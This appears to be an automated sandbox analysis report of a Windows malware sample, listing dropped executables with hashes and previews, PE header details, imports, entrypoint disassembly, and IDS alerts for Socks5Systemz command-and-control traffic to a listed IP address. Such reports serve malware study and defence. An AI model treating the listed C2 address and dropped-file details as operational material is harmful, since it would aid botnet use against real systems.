                                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                Malicious:false
                                                                Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ONE[1].file

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4065622
                                                                Entropy (8bit):7.998333417378816
                                                                Encrypted:true
                                                                SSDEEP:98304:Nd7lj7PJtJzLJo+Pb+jA2qBsK6Vz6Vl1ggkCURIO+S1Hn3PEQeK8FuIQQj9dRJ:bl/tBZ+0jGK6R62hfd1Hnp4FuIvLRJ
                                                                MD5:98C5D582966DD7E46FF73E7D6D62B87D
                                                                SHA1:4F37D61ED6959E6991C8888504B396CAF195383F
                                                                SHA-256:E0683D5F72C585FD92753C2CE41152B71364B04299684697C9D0D5E22638CC32
                                                                SHA-512:119C362FA6B09CA0B2868E0FB6D9A679F06CB38A31FE9971F6ED1AABA139EC7535D842197FB5E4E995E988E754FF4544DF2FE13C5A8F9B08E5F2106EB96B9140
                                                                Malicious:true
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\download[1].htm

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:V:V
                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                Malicious:false
                                                                Preview:0

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\key[1].htm

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):21
                                                                Entropy (8bit):3.880179922675737
                                                                Encrypted:false
                                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                                MD5:408E94319D97609B8E768415873D5A14
                                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                Malicious:false
                                                                Preview:9tKiK3bsYm4fMuK47Pk3s

                                                                C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_iscrypt.dll

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2560
                                                                Entropy (8bit):2.8818118453929262
                                                                Encrypted:false
                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_setup64.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6144
                                                                Entropy (8bit):4.215994423157539
                                                                Encrypted:false
                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\is-DPC68.tmp\_isetup\_shfoldr.dll

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23312
                                                                Entropy (8bit):4.596242908851566
                                                                Encrypted:false
                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):704000
                                                                Entropy (8bit):6.506162621910228
                                                                Encrypted:false
                                                                SSDEEP:12288:D/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyR8h1K8xyF:jkqZ1G7DMvrP537dzHsA6hcHGbH3Eahs
                                                                MD5:62FDBBA6364B54BBE42B437284A2963C
                                                                SHA1:B581DFA1E0C38C692426A62B8B4770C5441C6337
                                                                SHA-256:07009EF71F1CEAA86F14A6ACC181336A3F1D18C3E19468E1F1F81335A8C75B43
                                                                SHA-512:F79FB771A83197DA6FDE21A49AA3B24A0E9F98691F24D6D19C021CC404E2767825C5C8D4C5E85F7DCB16773B1D19FED32CAF83D034B05C50190099C8F5925671
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4065622
                                                                Entropy (8bit):7.998333417378816
                                                                Encrypted:true
                                                                SSDEEP:98304:Nd7lj7PJtJzLJo+Pb+jA2qBsK6Vz6Vl1ggkCURIO+S1Hn3PEQeK8FuIQQj9dRJ:bl/tBZ+0jGK6R62hfd1Hnp4FuIvLRJ
                                                                MD5:98C5D582966DD7E46FF73E7D6D62B87D
                                                                SHA1:4F37D61ED6959E6991C8888504B396CAF195383F
                                                                SHA-256:E0683D5F72C585FD92753C2CE41152B71364B04299684697C9D0D5E22638CC32
                                                                SHA-512:119C362FA6B09CA0B2868E0FB6D9A679F06CB38A31FE9971F6ED1AABA139EC7535D842197FB5E4E995E988E754FF4544DF2FE13C5A8F9B08E5F2106EB96B9140
                                                                Malicious:true
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.990387966645919
                                                                Encrypted:false
                                                                SSDEEP:48:65uxic/UNMSAjItYiA254tdqlkCuFCpfbNtm:cc9jItYbaC+zNt
                                                                MD5:F328A95046E3A2514C36347EAEC911C0
                                                                SHA1:8EC9C18384CA1E08A397BF7B3D46B6D784669EF0
                                                                SHA-256:D55E86610DCAD29C3D2857D9DAE91AA51228B1FA001EA2D7BDA88B9A2B5570A9
                                                                SHA-512:2FC3621433C5DA3DCB5B9D9133CD9D63D8F53FD60C81DDAB8B83BAD60EFB98942FC38A63DFA98EDFC8358C8E4E345A7EC8FA3AA14C18D4337CDD90EA0AED4718
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............&... ...@....@.. ....................................@..................................&..O....@.......................`.......%..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......\ ...............................................................*..(....*..BSJB............v4.0.30319......l.......#~..,...H...#Strings....t.......#US.x.......#GUID...........#Blob...........G..........3..........................................x...............Z.....!.....,.....I.................A...........&.....`.....5.................{.....@.........................A.....P ........#...R ................;...................).....1.....9.....A.....I.....Q.....Y.....

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):5.8706564154608785
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:438'784 bytes
                                                                MD5:5237853dbebaefb1dfa86130dd1d39fa
                                                                SHA1:c2a42211c8970e1f10cc13261d5e133739c196f4
                                                                SHA256:e185e43f039f7a97672db4a44597abd6d2bf49c08d7bc689318a098ec826bb00
                                                                SHA512:72fc21a0d325b88b4e99d66d05f77ac362aa03cdd41db053cfecd2fec148740bc5349fa45001650500f844ff76784bc12177543deb8d075c5c84e93420c15c7a
                                                                SSDEEP:6144:bIkLslp6440MCP5FQn40gxeppjMo7LR68z1T:bIkIlp6445M3Q40goppL7LRNh
                                                                TLSH:5A94C0139691BCA0E96647329D2EC6E4762EB9214E193F7B33786F2F14701B2D273319
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P....%..P....4..P...."..P.......P...P..'P....+..P....5..P....0..P..Rich.P..........................PE..L....{.d...

                                                                File Icon

                                                                Icon Hash:0e4655313179b18f

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x405583
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x649C7BEB [Wed Jun 28 18:28:59 2023 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:db15b2e5808ca5f767d44b63a5e7dde0

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007FE08D030713h
                                                                jmp 00007FE08D02CB6Eh
                                                                mov edi, edi
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 28h
                                                                xor eax, eax
                                                                push ebx
                                                                mov ebx, dword ptr [ebp+0Ch]
                                                                push esi
                                                                mov esi, dword ptr [ebp+10h]
                                                                push edi
                                                                mov edi, dword ptr [ebp+08h]
                                                                mov byte ptr [ebp-08h], al
                                                                mov byte ptr [ebp-07h], al
                                                                mov byte ptr [ebp-06h], al
                                                                mov byte ptr [ebp-05h], al
                                                                mov byte ptr [ebp-04h], al
                                                                mov byte ptr [ebp-03h], al
                                                                mov byte ptr [ebp-02h], al
                                                                mov byte ptr [ebp-01h], al
                                                                cmp dword ptr [0045D04Ch], eax
                                                                je 00007FE08D02CD00h
                                                                push dword ptr [00461CCCh]
                                                                call 00007FE08D03017Bh
                                                                pop ecx
                                                                jmp 00007FE08D02CCF7h
                                                                mov eax, 0040903Ch
                                                                mov ecx, dword ptr [ebp+14h]
                                                                mov edx, 000000A6h
                                                                cmp ecx, edx
                                                                jg 00007FE08D02CE6Ah
                                                                je 00007FE08D02CE51h
                                                                cmp ecx, 19h
                                                                jg 00007FE08D02CDEEh
                                                                je 00007FE08D02CDDFh
                                                                mov edx, ecx
                                                                push 00000002h
                                                                pop ecx
                                                                sub edx, ecx
                                                                je 00007FE08D02CDC3h
                                                                dec edx
                                                                je 00007FE08D02CDB3h
                                                                sub edx, 05h
                                                                je 00007FE08D02CD9Bh
                                                                dec edx
                                                                je 00007FE08D02CD7Ch
                                                                sub edx, 05h
                                                                je 00007FE08D02CD63h
                                                                dec edx
                                                                je 00007FE08D02CD37h
                                                                sub edx, 09h
                                                                jne 00007FE08D02CECAh
                                                                mov dword ptr [ebp-28h], 00000003h
                                                                mov dword ptr [ebp-24h], 00401320h
                                                                fld qword ptr [edi]
                                                                lea ecx, dword ptr [ebp-28h]
                                                                fstp qword ptr [ebp-20h]
                                                                push ecx
                                                                fld qword ptr [ebx]
                                                                fstp qword ptr [ebp+00h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [C++] VS2008 build 21022
                                                                • [ASM] VS2008 build 21022
                                                                • [ C ] VS2008 build 21022
                                                                • [IMP] VS2005 build 50727
                                                                • [RES] VS2008 build 21022
                                                                • [LNK] VS2008 build 21022

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x562b40x28.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xe618.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x41580x40.text
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a4.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x55c420x55e000a68425b9b7033c7c7fe633cac15f850False0.6249516693959243data6.279211279997702IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x570000xacd40x6200d2ee99fd572fa8cfdd221e4a76b71e24False0.08577806122448979data1.0105107112719858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .wujep0x620000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .jin0x630000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .rsrc0x640000xe6180xe800774582d7b37a96cf37d840e024294928False0.3540375808189655data4.336055078457096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_CURSOR0x6d8f00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                RT_CURSOR0x6da200xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                RT_CURSOR0x6daf80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                RT_CURSOR0x6e9a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                RT_CURSOR0x6f2480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                RT_CURSOR0x6f7e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                RT_CURSOR0x706880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                RT_CURSOR0x70f300x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                RT_ICON0x646300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7194700460829493
                                                                RT_ICON0x646300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7194700460829493
                                                                RT_ICON0x64cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.46690871369294606
                                                                RT_ICON0x64cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.46690871369294606
                                                                RT_ICON0x672a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.7615248226950354
                                                                RT_ICON0x672a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.7615248226950354
                                                                RT_ICON0x677380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4898720682302772
                                                                RT_ICON0x677380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4898720682302772
                                                                RT_ICON0x685e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.46796028880866425
                                                                RT_ICON0x685e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.46796028880866425
                                                                RT_ICON0x68e880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.43641618497109824
                                                                RT_ICON0x68e880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.43641618497109824
                                                                RT_ICON0x693f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27977178423236515
                                                                RT_ICON0x693f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27977178423236515
                                                                RT_ICON0x6b9980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2910412757973734
                                                                RT_ICON0x6b9980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2910412757973734
                                                                RT_ICON0x6ca400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.30655737704918035
                                                                RT_ICON0x6ca400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.30655737704918035
                                                                RT_ICON0x6d3c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3351063829787234
                                                                RT_ICON0x6d3c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3351063829787234
                                                                RT_STRING0x717180x252dataTamilIndia0.5084175084175084
                                                                RT_STRING0x717180x252dataTamilSri Lanka0.5084175084175084
                                                                RT_STRING0x719700x396dataTamilIndia0.4596949891067538
                                                                RT_STRING0x719700x396dataTamilSri Lanka0.4596949891067538
                                                                RT_STRING0x71d080x51edataTamilIndia0.4480916030534351
                                                                RT_STRING0x71d080x51edataTamilSri Lanka0.4480916030534351
                                                                RT_STRING0x722280x3eedataTamilIndia0.4542743538767396
                                                                RT_STRING0x722280x3eedataTamilSri Lanka0.4542743538767396
                                                                RT_ACCELERATOR0x6d8980x58dataTamilIndia0.7954545454545454
                                                                RT_ACCELERATOR0x6d8980x58dataTamilSri Lanka0.7954545454545454
                                                                RT_GROUP_CURSOR0x6dad00x22data1.0588235294117647
                                                                RT_GROUP_CURSOR0x6f7b00x30data0.9375
                                                                RT_GROUP_CURSOR0x714980x30data0.9375
                                                                RT_GROUP_ICON0x677080x30dataTamilIndia0.9375
                                                                RT_GROUP_ICON0x677080x30dataTamilSri Lanka0.9375
                                                                RT_GROUP_ICON0x6d8300x68dataTamilIndia0.7019230769230769
                                                                RT_GROUP_ICON0x6d8300x68dataTamilSri Lanka0.7019230769230769
                                                                RT_VERSION0x714c80x250data0.5422297297297297

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllGetComputerNameA, GetTempFileNameW, WriteConsoleInputW, SetComputerNameExA, SetEndOfFile, InterlockedIncrement, EnumCalendarInfoW, OpenJobObjectA, GetCurrentProcess, GetSystemDefaultLCID, CallNamedPipeW, OutputDebugStringW, GetModuleHandleW, GetCommConfig, FindNextVolumeMountPointA, GetDllDirectoryW, GetConsoleAliasExesW, EnumTimeFormatsA, EnumTimeFormatsW, GetUserDefaultLangID, TlsSetValue, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, SetConsoleCP, GetFileAttributesA, GetTimeFormatW, GetModuleFileNameW, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, ChangeTimerQueueTimer, SetLastError, GetProcAddress, VirtualAlloc, SetComputerNameA, LoadLibraryA, InterlockedExchangeAdd, GlobalUnWire, FreeEnvironmentStringsW, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, GetVersionExA, GetDiskFreeSpaceExW, TlsFree, SetFileAttributesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, HeapFree, CloseHandle, TerminateProcess, IsDebuggerPresent, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, CreateFileA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                TamilIndia
                                                                TamilSri Lanka

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-20T05:03:19.330150+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:19.330150+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:19.707958+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:19.707958+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:22.679741+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:22.679741+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449858185.208.158.20280TCP
                                                                2024-11-20T05:03:23.511115+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449885185.208.158.20280TCP
                                                                2024-11-20T05:03:23.511115+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449885185.208.158.20280TCP
                                                                2024-11-20T05:03:24.349525+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449892185.208.158.20280TCP
                                                                2024-11-20T05:03:24.349525+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449892185.208.158.20280TCP
                                                                2024-11-20T05:03:25.182992+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449898185.208.158.20280TCP
                                                                2024-11-20T05:03:25.182992+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449898185.208.158.20280TCP
                                                                2024-11-20T05:03:26.013459+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449904185.208.158.20280TCP
